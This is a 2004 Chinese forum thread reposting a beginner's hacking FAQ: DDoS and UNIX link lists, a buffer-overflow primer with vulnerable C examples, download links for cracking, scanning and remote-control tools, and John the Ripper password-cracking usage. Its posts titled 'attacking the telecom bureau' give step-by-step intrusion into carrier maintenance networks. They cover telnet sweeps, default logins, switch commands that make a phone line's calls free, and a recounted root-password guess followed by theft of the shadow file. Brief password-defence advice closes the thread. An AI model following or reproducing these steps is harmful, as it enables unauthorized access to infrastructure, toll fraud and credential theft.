http://www.sixthroom.com/ailan/f ... otID=349&ID=349
Cisco路由器上如何防止分布式拒绝服务(DDoS)攻击
http://www.sixthroom.com/ailan/f ... otID=348&ID=348
独裁者(Autocrat)教程

http://www.sixthroom.com/ailan/f ... otID=347&ID=347
DoS,DDOS(拒绝服务)攻防简明问答

http://www.sixthroom.com/ailan/f ... otID=346&ID=346
几种分布式攻击的防范 http://www.sixthroom.com/ailan/f ... otID=344&ID=344
拒绝服务攻击原理及解决方法

http://www.sixthroom.com/ailan/f ... otID=342&ID=342
DDOS图解教程下载 http://www.chinesehack.org/down/show.asp?id=2720&down=1(里面好像有病毒,建议先杀

毒后观看)
分布式拒绝服务攻击(DDoS)原理及防范

http://www.sixthroom.com/ailan/f ... otID=341&ID=341
分布式拒绝服务攻击及其防治

http://www.sixthroom.com/ailan/f ... otID=340&ID=340


第二十四章------关于UNIX/Linux

简单说明:
UNIX/Linux无疑是比windows更历史悠久更出色的OS。可惜缺少了一些“平易近人”,让许多人望而却步。这里

也不打算讲些什么,想学它的人不如从学习怎么找相关资料开始吧,呵呵。不过还是建议初学者从WINDOWS入手

比较好一些,而且按市占有率看,也应该多接触WINDOWS系统。当然抽空熟悉一下U系统也是不错的选择,这里

简单介绍大家一点资料。

相关资料:
rootkit综述 http://www.sixthroom.com/ailan/f ... otID=332&ID=332
Linux 使用技巧33条 http://www.sixthroom.com/ailan/f ... otID=335&ID=335
Linux配置与优化经验谈

http://www.sixthroom.com/ailan/f ... otID=337&ID=337
Unix黑客初学者指导 http://www.sixthroom.com/ailan/f ... otID=336&ID=336
入侵UNIX http://www.sixthroom.com/ailan/f ... otID=339&ID=339

相关网址:
蓝森林 http://lslnet.com/linux/
Linux大本营 http://lydr.myrice.com/
LINUX-AID技术支持中心 http://www.linuxaid.com.cn/
LINUX-NOW http://new.linuxnow.com/
台湾LINUX协会 http://www.linux.org.tw/
GNU的官方网站 http://www.gnu.org/
中国科学技术大学Linux使用者协会
http://lug.ustc.edu.cn/

第二十五章------溢出

简单说明:
溢出对我们这些小鸟们属于比较高级的玩意了。所以在这里也不准备多提,否则就违反了这篇文章写给初学者

的初衷了。
缓冲区溢出
缓冲区是内存中存放数据的地方。在程序试图将数据放到计算机内存中的某一位置,但没有足够空间时会发生

缓冲区溢出。
缓冲区是程序运行时计算机内存中的一个连续的块,它保存了给定类型的数据。问题随着动态分配变量而出现

。为了不用太多的内存,一个有动态分配变量的程序在程序运行时才决定给他们分配多少内存。如果程序在动

态分配缓冲区放入太多的数据会有什么现象?它溢出了,漏到了别的地方。一个缓冲区溢出应用程序使用这个

溢出的数据将汇编语言代码放到计算机的内存中,通常是产生root权限的地方。单单的缓冲区溢出,并不会产

生安全问题。只有将溢出送到能够以root权限运行命令的区域才行。这样,一个缓冲区利用程序将能运行的指

令放在了有root权限的内存中,从而一旦运行这些指令,就是以root权限控制了计算机。总结一下上面的描述

。缓冲区溢出指的是一种系统攻击的手段,通过往程序的缓冲区写超出其长度的内容,造成缓冲区的溢出,从

而破坏程序的堆栈,使程序转而执行其它指令,以达到攻击的目的。据统计,通过缓冲区溢出进行的攻击占所

有系统攻击总数的80%以上。造成缓冲区溢出的原因是程序中没有仔细检查用户输入的参数。例如下面程序:

  example0.c
  -----------------------------------------------------------
  void function(char *str) {
  char buffer[16];
  
  strcpy(buffer,str);
  }
  -----------------------------------------------------------

上面的strcpy()将直接把str中的内容copy到buffer中。这样只要str的长度大于16,就会造成buffer的溢出,

使程序运行出错。存在象strcpy这样的问题的标准函数还有strcat(),sprintf(),vsprintf(),gets(),scanf(),

以及在循环内的getc(),fgetc(),getchar()等。在C语言中,静态变量是分配在数据段中的,动态变量是分配

在堆栈段的。缓冲区溢出是利用堆栈段的溢出的。一个程序在内存中通常分为程序段,数据端和堆栈三部分。

程序段里放着程序的机器码和只读数据,这个段通常是只读,对它的写xx作是非法的。数据段放的是程序中的

静态数据。动态数据则通过堆栈来存放。在内存中,它们的位置如下:

  
  /――――――――\  内存低端
  |程序段|
  |―――――――――|
  |数据段|
  |―――――――――|
  |堆栈|
  \―――――――――/内存高端

堆栈是内存中的一个连续的块。一个叫堆栈指针的寄存器(SP)指向堆栈的栈顶。堆栈的底部是一个固定地址

。堆栈有一个特点就是,后进先出。也就是说,后放入的数据第一个取出。它支持两个xx作,PUSH和POP。PUSH

是将数据放到栈的顶端,POP是将栈顶的数据取出。在高级语言中,程序函数调用和函数中的临时变量都用到堆

栈。参数的传递和返回值是也用到了堆栈。通常对局部变量的引用是通过给出它们对SP的偏移量来实现的。另

外还有一个基址指针(FP,在Intel芯片中是BP),许多编译器实际上是用它来引用本地变量和参数的。通常,

参数的相对FP的偏移是正的,局部变量是负的。当程序中发生函数调用时,计算机做如下xx作:首先把参数压

入堆栈;然后保存指令寄存器(IP)中的内容,做为返回地址(RET);第三个放入堆栈的是基址寄存器(FP);然后

把当前的栈指针(SP)拷贝到FP,做为新的基地址;最后为本地变量留出一定空间,把SP减去适当的数值。

  下面举个例子:
  example1.c:
  ------------------------------------------------------------
  void function(int a, int b, int c) {
  char buffer1[5];
  char buffer2[10];
  }
  
  void main() {
  function(1,2,3);
  }
  -----------------------------------------------------------

为了理解程序是怎样调用函数function()的,使用-S选项,在Linux下,用gcc进行编译,产生汇编代码输出:

  $ gcc -S -o example1.s example1.c

  看看输出文件中调用函数的那部分:

  pushl $3
  pushl $2
  pushl $1
  call function

  这就将3个参数压到堆栈里了,并调用function()。指令call会将指令指针IP压入堆栈。在返回时,RET要

用到这个保存的IP。在函数中,第一要做的事是进行一些必要的处理。每个函数都必须有这些过程:

  
  pushl %ebp
  movl %esp,%ebp
  subl $20,%esp

这几条指令将EBP,基址指针放入堆栈。然后将当前SP拷贝到EBP。然后,为本地变量分配空间,并将它们的大

小从SP里减掉。由于内存分配是以字为单位的,因此,这里的buffer1用了8字节(2个字,一个字4字节)。Buf

fer2用了12字节(3个字)。所以这里将ESP减了20。这样,现在,堆栈看起来应该是这样的。


  低端内存高端内存
  buffer2 buffer1 sfp ret a b c
  < ------ [ ][ ][ ][ ][ ][ ][ ]
  栈顶栈底
  
  缓冲区溢出就是在一个缓冲区里写入过多的数据。那怎样利用呢,看
一下下面程序:
  
  
  example2.c
  -----------------------------------------------------------
  void function(char *str) {
  char buffer[16];
  
  strcpy(buffer,str);
  }
  
  void main() {
  char large_string[256];
  int i;
  
  for( i = 0; i < 255; i++)
  large_string = 'A';
  
  function(large_string);
  }
  ------------------------------------------------------------

这个程序是一个经典的缓冲区溢出编码错误。函数将一个字符串不经过边界检查,拷贝到另一内存区域。当调

用函数function()时,堆栈如下:
  
  低内存端buffer sfp ret *str高内存端
  < ------ [ ][ ][ ][ ]
  栈顶栈底

很明显,程序执行的结果是"Segmentation fault (core dumped)"或类似的出错信息。因为从buffer开始的256

个字节都将被*str的内容'A'覆盖,包括sfp, ret,甚至*str。'A'的十六进值为0x41,所以函数的返回地址变成

了0x41414141, 这超出了程序的地址空间,所以出现段错误。可见,缓冲区溢出允许我们改变一个函数的返回

地址。通过这种方式,可以改变程序的执行顺序。

由于是简单介绍给大家熟悉一下,所以在这里不给出软件了,如果大家有需要的话,可以在附录中找到。

相关资料:
缓冲区溢出及其攻击 http://www.sixthroom.com/ailan/f ... otID=312&ID=312
缓冲区溢出原理分析 http://www.sixthroom.com/ailan/f ... otID=313&ID=313
更多资料请到 www.sixthroom.com


第二十六章------OICQ

简单介绍
关于QQ我不想说什么了,一种既时通讯软件,上网的人都知道。现在常见的问题,无非就是谁能给我个QQ?谁能

帮我偷个QQ?我的QQ了,谁能帮我偷回来?怎样偷QQ?个人认为偷QQ这种事,是对黑客精神的一种侮辱,请不要

在问这种问题,更不要问我这种问题,因为我对偷QQ的事特别讨厌。如果你的号码真的被偷了,哪也只能说明

你没安全意识,你可以试试下面给出的地址,时间可能会慢一点,不过也只有等了,如果实在找不回来,哪也

只能当做一个教训了。下次注意吧。必竟黑过来黑回去的没什么意思,好了,下面的地址是腾讯的服务区,有

事就到哪里去吧:

相关网站
被盗号码申诉 http://service.tencent.com/service/request.shtml
QQ密码保护申请 http://service.tencent.com/reg/register.shtml

新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16354991.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

黑客安全技术入门常见问题集! (点击:2000)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:08:22

【6楼】 附录

关于常用工具的使用
简单说明:

黑客的工具就像战士的枪,一定要熟练掌握灵活应用。这里给出一些常用的工具方便新手下载。其他工具还是

自己搜一下吧。一般命令行下的工具是自带简单的使用说明(即usage)的,当输入错误参数或不输参数就会显

示。不要因为帮助是英文的就放弃学习。给出的软件使用教程,总会有没讲到或讲的不够细致的地方。遇到问

题请首先尝试自己解决。实在不行的话,就请把握住问题的要点,清楚地表达出来。补充一般命令行下的软件

直接打这个软件名,不加任何参数(还有一部份加/?)就会显示软件帮助及参数的。

相关工具:
命令行工具:
ShutDown NOW! 4.51 远程重起的小工具

http://download.pchome.net/php/d ... dn451.zip&svr=4
pstools系列工具 包括pslist,pskill,psinfo等实用的工具

http://www.cnno.org/down/download.asp?id=67&downid=1 内有英文说明,比较易懂。
Windows NT/2000 自动攻击探测机 http://www.cnno.org/down/download.asp?id=196&downid=1
webcracker4.0 http://www.cnsq.net/sq88/down/show.asp?id=248&down=1
SMBcrack V4 暴力破解2000共享密码 http://www.cnsq.net/sq88/down/show.asp?id=295&down=1
sc.exe 服务管理工具 http://www.ndsafe.com/fires/SC.zip
attacker.zip Windows下的监控端口捕获 http://www.ndsafe.com/fires/attacker.zip
nmap-3.00-win32 最优秀的扫描工具 http://gd.tuwien.ac.at/pc/bazar/nmap/nmap-3.00-win32.zip
regshell 命令行方式下的交互式注册表编辑工具

http://www.feelids.com/bbs/viewt ... ;tid=42&pid=137
ScanloOK 1.0 漏洞扫描器 http://www.chinesehack.org/down/show.asp?id=1559&down=1
Win2k.Svr.ResKit完全安装版 微软出的“黑客”工具包

http://www.microsoft.com/windows ... t/tools/default.asp
NC 黑客的瑞士军刀 http://www.atstake.com/research/tools/nc11nt.zip
HScan V0.70 http://www.cnhonker.net/Down/show.php?id=56&down=1
Ping Backdoor V0.41 http://www.cnhonker.net/Down/show.php?id=55&down=1

图形界面工具:
superscan3.0 端口扫描,速度快 http://ice.prohosting.com/v60/dow/superscan.rar
winfingerprint-0.5.3 http://www.cnhonker.net/Down/show.php?id=25&down=1
x-scan 2.3 综合扫描工具 http://www.xfocus.net/download.php?id=366
流光4.7版WINNT/2000 http://www.netxeyes.org/fluxay47/fluxay47build3200setup.exe
X-Port http://www.xfocus.net/download.php?id=327
SQLTools http://www.xfocus.net/download.php?id=351
TFTP服务器 简单的文件传输工具,利用Unicode漏洞必备 http://arm.533.net/hack/tftpd32.zip
DameWare3.66.0.0汉化注册版 强大的远程控制软件 http://www.sixthroom.com/down/show.asp?id=90&down=1
l0pht4.0 破解SAM的著名工具(带注册机) http://www.cnsq.net/sq88/down/show.asp?id=443&down=1
strcm-vnc strcm自动装载VNC远程图形控制 http://www.cnsq.net/sq88/down/show.asp?id=281&down=1
Remote Administrator v2.1 远程控屏工具 http://www.gyfly.com/asp/soft/download.asp?id=302&downid=3
DomyRun 1.0 http://www.cnsq.net/sq88/down/show.asp?id=714&down=1
Lithium v1.03 http://www.cnsq.net/sq88/down/show.asp?id=678&down=1
追捕! V1.70 Build 1001 Beta http://www.cnsq.net/sq88/down/show.asp?id=618&down=1
追捕! 数据升级包 Build 2002.10.01 http://www.cnsq.net/sq88/down/show.asp?id=617&down=1


相关帖子:
SuperScan使用详解 http://www.sixthroom.com/ailan/f ... otID=315&ID=315
使用strcm自动装载VNC远程图形控制

http://www.sixthroom.com/ailan/f ... otID=317&ID=317
DameWare NT Utilities 使用心得

http://www.sixthroom.com/ailan/f ... otID=318&ID=318
QQ动态代理IP技术 http://www.sixthroom.com/ailan/f ... otID=319&ID=319
Nmap扫描器的使用 http://www.sixthroom.com/ailan/f ... otID=320&ID=320
Nmap详细使用说明 http://www.sixthroom.com/ailan/f ... otID=321&ID=321
“网络神偷”使用说明 http://www.sixthroom.com/ailan/f ... otID=322&ID=322
nc使用技巧 http://www.sixthroom.com/ailan/f ... otID=323&ID=323
DameWare NT Utilities教程

http://www.sixthroom.com/ailan/f ... otID=324&ID=324
L0phtcrack 3.0 图解使用教程

http://www.sixthroom.com/ailan/f ... otID=325&ID=325
Ifconfig网络配置工具详解

http://www.sixthroom.com/ailan/f ... otID=326&ID=326
win2000server终端服务自带的一些工具的简介
http://www.sixthroom.com/ailan/f ... otID=327&ID=327
关于 radmin 的远程安装

http://www.sixthroom.com/ailan/f ... otID=328&ID=328
SC介绍和教程 http://www.sixthroom.com/ailan/f ... otID=329&ID=329
代理猎手(Proxy Hunter)使用教程 http://wwwb.pconline.com.cn/pcedu/soft/doc/10312/1.htm
OICQ使用教程 http://www.cfan.net.cn/E-zine/2002_06/study/ (绝对值得一看)
冰河的使用教程 http://www.ttian.net/article/show.php?id=103
破解工具AccessDiver的使用方法

http://www.sixthroom.com/ailan/f ... otID=330&ID=330
(在下面提供的下载教程里面也有很多软件的使用方法,大家可以参照)


附录

关于教程
我收集了一些教程的下载地址。看教程重要的是学会其中的思路和创新,消化吸收成为自己的东西,并举一反

三。不要当它们是资料库,要用时是很难找到想找的文章的。不同教程里会有文章重复,就当是强化记忆再看

一遍。就像前辈说的一样,看教程看实例重要的是要掌握及培养思路,当你的头脑中有一个清晰的思路后,哪

你在学习起来就会事半功倍,“工作”起来也会少走不少弯路。有时间我会把这篇文章里所有的资料做成一份

电子文档。希望大家能够喜欢。
(排名不分先后,^_^)
小西的黑客教程(菜鸟版) http://www.cnzzz.com/download/do ... 926605520&Url=1
流光教程电子版 http://www.88e.com.cn/software/download.asp?id=946&downid=1
ncc制作的超级菜鸟黑客速成 http://61.138.196.132/sq88/down/show.asp?id=200&down=1
鹰派的网络经典教材 http://61.138.196.132/sq88/down/show.asp?id=202&down=1
溯雪 光影 小榕 论坛精华集 http://www.andyxu.net/banana/tools/netXeyes.chm
安全焦点文档精华 http://www.andyxu.net/banana/tools/xfocus_doc.rar
三陀工作室整理的DELPHI和黑客技巧1.5 http://stgzs.myetang.com/Hack/DelphiTechV1.5.chm
rick的unix教材 http://www.7swords.net/Downloads/show.asp?id=139&down=3
幻影旅团 团长:刺 写的黑客教程 http://mybanqiao.jia.net/rije/banana/tools/hy.rar
菜牛兄写的汉化与破解软件教程 http://mybanqiao.jia.net/rije/banana/tools/niu.rar
单机安装WEB服务,FTP服务,Imail邮件服务,和超级雷傲论坛全攻略

http://www.andyxu.net/banana/tools/WEB.chm
雾中鸟的《系统网络入侵方法小结》 http://www.lfpcb.com/czxz/show.asp?id=623&down=1
傲气雄鹰的教程 http://scfly.3322.net/
轰天炮写的黑客入门 http://mybanqiao.jia.net/rije/banana/tools/htp.rar
小铭写的《网络最菜黑客指南》 http://www.andyxu.net/banana/tools/001.rar
黑客防线全站教程 http://www.andyxu.net/banana/tools/banana_01.rar
菜鸟宝典 http://www.88e.com.cn/software/download.asp?id=1597&downid=1
黑客基础教材 论坛成员沉睡不醒收集制作 http://61.138.196.132/sq88/down/show.asp?id=351&down=1
目前网上流行的大部分教程,前辈都整理了出来,我只不过验证了一下链接的可靠性,因为这段时间不知是什

么原因有不少不错的网站都关门了,链接自然也就失效了。所以我将全部地址重新整理了一下,现在全部地址

均经过测试可下载。下面的教程是我找了几个比较新的,也希望大家喜欢。
黑客守则 http://aokay.topcities.com/hwx4.htm
《高手之路,DOS起步》http://www.andyxu.net/banana/tools/dos.chm
经典电脑故障全攻略 http://www.cnzzz.com/download/do ... 158186922&Url=1
黑客技术 http://www.lfpcb.com/czxz/show.asp?id=637&down=1
黑白专区教程总结 http://www.cnsq.net/sq88/down/show.asp?id=708&down=1
黑客攻放指南 第10期 http://www.cnzzz.com/download/do ... 733159713&Url=1
黑客攻放指南 第8-9期 http://www.cnzzz.com/download/do ... 023822128&Url=1
黑客攻放指南 第1-7期 http://www.cnzzz.com/download/do ... 594674249&Url=1
UNICODE编码漏洞全攻略 http://www.andyxu.net/banana/tools/UNICODE.chm
6种国产木马使用教程 http://www.andyxu.net/banana/tools/mmjc.rar
手把手教你用流光 http://www.cnno.org/down/download.asp?id=113&downid=1

推荐网址:
呵呵,介绍这些网址呢,大部份是前辈介绍的,当然我也加入了一些我自己的收藏,第一位嘛,我给改了一下

呵呵。(除了第一个,排名不分先后,^_^) 其实我常去的站呢,也都在这里边了。
第六空间 www.sixthroom.com 这里你要什么有什么,文章全是精品。提到的软件全部都有下载。*特别推荐*
灰色轨迹 http://www.sandflee.net/ 或 http://www.isgrey.com/ (前过这个文件的都知道这就是前辈的站

点了,没什么可说的了,自己看吧)
wawa烂页 http://61.184.86.21/ (WINDOWS高手的个人站点,里面提供的软件也都不错)
netXeyes http://www.netxeyes.com/ (中国黑客界的传奇人物,榕哥的个人站点,不过最近论坛出现问题)
安全焦点 http://www.xfocus.net/ (知道X-SCAN吧,哪就不用多说了,。这里的漏洞资料也是相当全的)
小凤居 http://www.chinesehack.net/ (我昨晚没打开,不知道是什么原因,提供软件下载,技术文章等)
幻影旅团总站BBS http://www.3389.net/bbs/ (对这里不是很了解,是前辈加上去的,不过技术文章不错)
绿盟科技 http://security.nsfocus.com/ (目前我所知道的国内技术性最强的站点了,袁哥,ADMIN等等的天

下,好文章太多了,不过建议初学者少去,去了也没用,看不懂。呵呵)
网络安全评估中心 http://www.cnns.net/ (又一个商业站点,提供漏洞资料,防护软件,技术文章等)
红色警戒 http://www.china4lert.org/ (一个以技术文章为主的个人站点,站长绿盟的版主)
黑客防线 http://badbanana.3322.net/ (一个综合性的安全站点,同样提供技术文章,软件下载等)
中国鹰派 http://www.chinawill.net/ (应该管是目前国内最大的民间黑客组织吧)
天天安全网 http://www.ttian.net/ (黑白关站后,这里应该算是最全的下载站点了)
补天网 http://www.patching.net/ (老牌的安全类站点了)
【网 嗅】http://www.netsill.com/ (这里的软件和文章不错)
CNSAFE.NET http://www.cnsafe.net/ (提供漏洞资料,技术文章等)
20CN http://www.20cn.net (不错的一个安全类站点,提供软件下载,技术文章等)
网络110 http://www.net110.net/ (又一个商业站点,提供技术文章,软件下载等)
诺亚方舟 http://nyfzns.520cat.com/ (提供技术文章,软件下载等)
红客联盟 http://www.cnhonker.net/ (这里的名气很大了,提供软件下载,技术文章等)
孤独剑客 http://www.janker.org/ (又一位中国安全界的名人孤独剑客的个人网站)
蓝盾网络 http://www.bluedon.com (一个商业站点,不过提供的在线检测等服务可都是免费的,很不错)
sometips http://www.sometips.com (一句话,里面的文章值得一看)
微软中国 http://www.microsoft.com/china/?MSCOMTB=MS_Microsoft|微软(中国)主页 (这个不用说了吧)
世界上著名黑客站点 http://www.hack.co.za

搜索引擎
如果有找不到的软件工具、文章教程、漏洞资料、网站地址就用它试试:
Google http://www.google.com
百度 http://www.baidu.com/
雅虎中国 http://cn.yahoo.com/
Google使用帮助:http://216.239.33.102/intl/zh-CN/about.html
百度的使用帮助:http://www.baidu.com/home.html
雅虎中国帮助 http://help.yahoo.com/help/cn/


还有几句“题外话”要说。我原本以为找些资料一两个通宵就能解决。结果陆续用了20个通宵。除了资料比较

分散的原因外,主要是因为我自己平时完全没有系统地思考过这些问题,因此不能及时有效的表述出来。好在

在找答案和看答案的同时,自己也获得了提高。如果各位能在这篇文章里找到一点自己需要的东西并获得提高

,那我就心满意足了。
(上面这段是原作者说的,)
我在这里也唠叨几句吧,和前辈的想法一样,本来想续写一下,大概有一夜就足够了,可是还是用了70多个小

时,没办法个人能力有限,如果不是前辈写出了框架,哪我还不知道要写到哪年呢。呵呵,在这里在次对原作

者ZZZEVAZZZ表示感谢,并至以崇高的敬意。还要对大家说的就是,黑客是一种精神,请不要去玷污它,黑QQ哪

种事,个人认为就是对黑客这个词的亵渎。如果你真的想成为一个黑客,哪么希望你能仔细看看这篇文章。相

信会对大家有一点点的帮助。。
本文是对原作者:zzzevazzz前辈所整理,写的“新手常见问题总结性回答”一文的一个补充,及修正,
祝大家圣诞节快乐,事事顺心,如意。
amoeba
http://gzmsg.focus.cn/msgview/23465/
2004年8月
新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16355022.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

攻击电讯局 (点击:1055)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:11:26

【7楼】 一.入侵电信局通用入口.
因形势发展需要.大都县,地一级电信局都成立了网路管理,交换维护中心.负责本地区的话务分析及交换维护.顾名思义.这两个机构都通过各种传输手段和该地区所有被监控的交换机连通.已ANONYMOUS局来说吧,该局网管中心建了一个FDDI IntraNET.通过交换机的人机命令口传来的话务数据进行网络的质量分析.交换传输维护中心也建立了一个IEEE.802.3的以太网.也和交换机相连.负责交换机的日常维护.这两个中心用路由器相互联结.再连上环境监控设备.就实现了所谓的机房无人值守.而有些局则为了方便技术人员的方便.另外架设拨号服务器,这样工作人员就可以在任何地方维护到交换机了.但你一定要先摸清ppp的接入电话号码.至于用户名嘛,各地不定,但很多地方是用omc(Operator & Maintenance Center)的.而且架这些intranet的人员往往在安全方面不是专家.懂我的话了吗?笨就是说他们也很菜 )在进去以后,先ping自己,知道ip后.(eg. 192.130.5.30)就开始找接交换机的前台机了.telnet 192.130.5.2(3,4,5,6,7...30) Be patient!
Unix 4.0
loginmc
password:
Succ.....
恭喜!你进去了.如omc加了密码,试试sybase,一般sybase没有密码.进去后.

就看老兄的啦!你想做什么!!!!!!!!!

二.S1240简介
进入系统以后,别忘了先w一下哦,否则给人kill了,以后加了密码,就没得玩喽!

%cd /u/omc/bin
%mpt
就进维护菜单了.按(1...n)选择对哪个局进行维护.进了交换机的维护端口(mptmon)
后看到的是>提示符.有点象dos? 不会吧~~~等你***就知道了###现在的s1240有两种版本(E & J) family,两种版本命令有些差别.我们先来鉴别一下.
>MM
TRAIN OCT-11-96 WED (TRAIN这儿显示的是局名,各地不一)
<
这是E family.

>MM
TRAIN
<88:dn=k'5757011;
在报告中系统会告诉你这个电话的物理地址EN=h'XXX&YYY;记住!下面有用.
>MM
TRAIN
<378:1="R_OLCOS",2="D_TN"&0&"YYY",3="D_CHRGINF"&0&"40",NA=H'XXX;
从此以后,该电话市话FREE! 注解:那要看你那里是不是拨号上网的,不过好多地方都是走分组交换网,是专线.
另外,那个改市话的方法有几点注意事项:
1. 只适用于老版本交换机;
2. IF 1 IS TRUE
IF 该交换局是长市合一局
THEN 长途也FREE了,哈哈

示例二:这个好象有点搞笑,我解开的网页是STUPID.HK.????,具体步骤如下: 我的目标是UBLIC.HK.????,可以GET PASSWD,CANT GOT SHADOW,于是我GET了它的HOSTS文件,试图找出它的关联,发现STUPID.HK.???? STUPID,TELNET TOTHERE.

USER:STUPID
PASSWD:STUPID CANT JION.
USER:ROOT
PASSWD:STUPID GOOD!I GOT IT.THE FOOL ROOT!
CD /ETC
GET PASSWD & GET SHADOW
USE UNSHADOW PASS2DIS BURTE,N:WEBMASTER P:WEBMASTER ...
以上是全过程,希望有**价值  

示例三:

口令的攻击术
黑客攻击目标时常常把破译普通用户的口令作为攻击的开始.先用"finger 远端主机名"找出主机上的用户帐号,然后就采用字典穷举法进行攻击.它的原理是这样的:网络上的用户常采用一个英语单词或自己的姓氏作为口令.通过一些程序,自动地从电脑字典中取出一个单词,作为用户的口令输入给远端的主机,申请进入系统.若口令错误,就按序取出下一个单词,进行下一个尝试.并一直循环下去,直到找到正确的口令,或字典的单词试完为止.由于这个破译过程由计算机程序来自动完成,几个小时就可以把字典的所有单词都试一遍.这类程序的典型是 LetMeIn version 2.0若这种方法不能奏效,黑客就会仔细寻找目标的薄弱环节和漏洞,伺机夺取目标中存放口令的文件shadow或passwd.因为在现代的Unix操作系统中,用户的基本信息存放在passwd文件中,而所有的口令则经过DES加密方法加密后专门存放在一个叫shadow(影子)的文件中,并处于严密的保护之下.老版本的Unix没有shadow文件,它所有的口令都存放在passwd文件中.一旦夺取口令文件,黑客们就会用专解DES加密法的程序来解口令.好,首先先让我们把 Unix
Unix一共是 [0x00~0xff]共128个字符,小于 0x20 的都算是控制符,不能
输入为口令, 0x7f 为转义符, 不能输入.那么总共有128 - 32 - 1 = 95 个字符可作为口令的字符. 也就是 10(数字)+33(标点符号)+26*2(大小写字母)=95个 如果passwd取任意5个字母+1位数字或符号(按顺序)
可能性是52*52*52*52*52*43=16,348,773,000(163亿种可能性)

但如果5个字母是一个常用词,估算一下设常用词5000条,从5000个常用词中取一个词与任意一个字符组合成口令,即5000*(2*2*2*2*2)(大小写)*43=6,880,000 (688万种可能性)

注:实际情况下绝大多数人都只用小写字符,可能性还要小.
但这已经可以用微机进行穷举了,在Pentium 200上每秒可算3,4万次,象这样简单的口令要不了3分钟. 如果有人用P200算上一周,将可进行200亿次攻击,所以6位口令是很不可靠的,至少要用7位. 可惜很多用户确实是这么设passwd的.以上只是粗略估算常见的一种情况,实际情况还要复杂,主要是根据用户取口令格式的变化而变化.那些hacker 并不需要所有人的口令,他们得到几个用户口令就能获取系统的控制权,所以取口令过于简单是对系统安全的不负责.
以下举个解密码程序的例子:

John The Ripper 1.4
这个软件由著名的黑客组织--UCF出的,它支持Unix,Dos,Windows,速度超快,可以说是目前同类中最杰出的作品.对于老式的passwd档(就是没shadow的那种, 任何人能看的都可以把 passwd密文存下来),John可以直接读取并用字典穷举击破. 对于现代的passwd+shadow的方式,John提供了UNSHADOW程序直接把两者合成出
新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16355081.html

缘煦的签名档

I AM TURE COLOR MAN
      

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

攻击电讯局 (点击:978)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:12:02

【8楼】 老式passwd文件.

John 的用法简介:
(1)
JOHN -PASSWD -W:WORDLIST
WORDLIST是字典文件.
PASSWD是你拿到的密码文件.
(2)
没有字典档时,在John的配置文件-->john.ini里,有密码长度和字母、数字、符号的设置,设好后就自动在内存里生成密码去找。这样你用软盘也可以,但机器的速度一定要快。
(3)
用暴力法破密码时使用参数-i:all
格式为JOHN -I:ALL -PASSWD
就可破象5e5t56e6这样的密码了。
这样可以产生A----ZZZZZZZZ的密码,不过时间...嘿嘿....
(4)
当破解到一半因种种原因需要暂时停止破解,按ctrl+c,

下次破解不必从新来过,只要john -restore:restore即可接着破。
john在纯dos下要比在win95下快,用unix更快,
(5)
对于象a2e4u7的密码是很难破出的,但JOHN的INCREMENTAL(渐进)方式的密码组合引入了一些字母的频率统计信息,即“高频先试”的原则,倒是有些启发意义。
在JOHN.INI中INCREMENTAL中的B,M,E各行意思如下:
B...Begin M...Middle E...End

如想要加一种方式, 比如字母加数字, 可以设成
[Incremental:a1]

CharCount = 36 (字符的个数,这儿是26个字母+10个数字)
MinLen = 8 (passwd的最小长度)
MaxLen = 8 (passwd的最大长度)
CharsetB = 1203984567smcbtdpajrhflgkwneiovyzuqx
CharsetM = 1203984567eaiornltsuchmdgpkbyvwfzxjq
CharsetE = 1203984567erynsatldoghikmcwpfubzjxvq
加在john.ini里, 执行是incremental参数选a1就行了.
(6)
按Ctrl-C中止运行时,输出是这样:
v: 18 c: 1295458688 t: 1:14:28:08 9% c/s: 11036 w: oentl - obftl
v: 0 c: 5424000 s: 862 c/s: 6292 w: fbymgf
V:是Victory,是破解成功的个数,因为俺运行一段后,破解了2个密码,显示了V:2,后来又破了几个,V后面的数字也相应变化。
C:Compare,是比较的次数,
T:time,程序已运行了多长时间.
9%: 当前完成度.至100%即全部完成.
c/s:是每秒比较的次数,随机器性能的高低而变化.
W:是当前正在试的一个word,这个word可能位于你的字典中(如果你用字典的话)或是john产生的。根据W所报告的数字可以估计破解到什么地方了。
(7)
运行需要的字典可以在internet上下载别人已做好的,如:

ftp.cads.com.tw 在 /pub/security下的DICT.ZIP
ftp.uni-koeln.de /pub/dictionaries/
ftp.ox.ac.uk /pub/wordlists

也可以自己做,用txt2dict或pass2dic等专用工具可自动把英语文件转换成字典.

新塘新世界花园业主论坛:http://gz.focus.cn/msglist/23465
原帖链接 http://gz.focus.cn/msgview/23465/16355088.html

缘煦的签名档

I AM TURE COLOR MAN       

缘煦

缘煦

个人积分:0

个人官职:论坛庶民

帖子总数:164

图片总数:0

官职:论坛庶民 500 个人中心 我的博客
发短消息我的帖子

攻击电讯局 (点击:1011)

缘煦 发表于 新塘新世界花园论坛 2004-08-13 20:12:37

【9楼】 防范的办法

防范的办法很简单,只要使自己的口令不在英语字典中,且不可能被别人猜测出就可以了. 一个好的口令应当至少有7个字符长,不要用个人信息(如生日,名字等),口令中要有一些非字母(如数字,标点符号,控制字符等),还要好记一些,不能写在纸上或计算机中的文件中,选择口令的一个好方法是将两个不相关的词用一个数字或控制字符相连,并截断为8个字符.例如我以前的口令是me2.hk97
保持口令安全的要点如下:
*不要将口令写下来.
*不要将口令存于电脑文件中.
*不要选取显而易见的信息作口令.
*不要让别人知道.
*不要在不同系统上使用同一口令.
*为防止眼明手快的人窃取口令,在输入口令时应确认无人在身边.
*定期改变口令,至少6个月要改变一次.
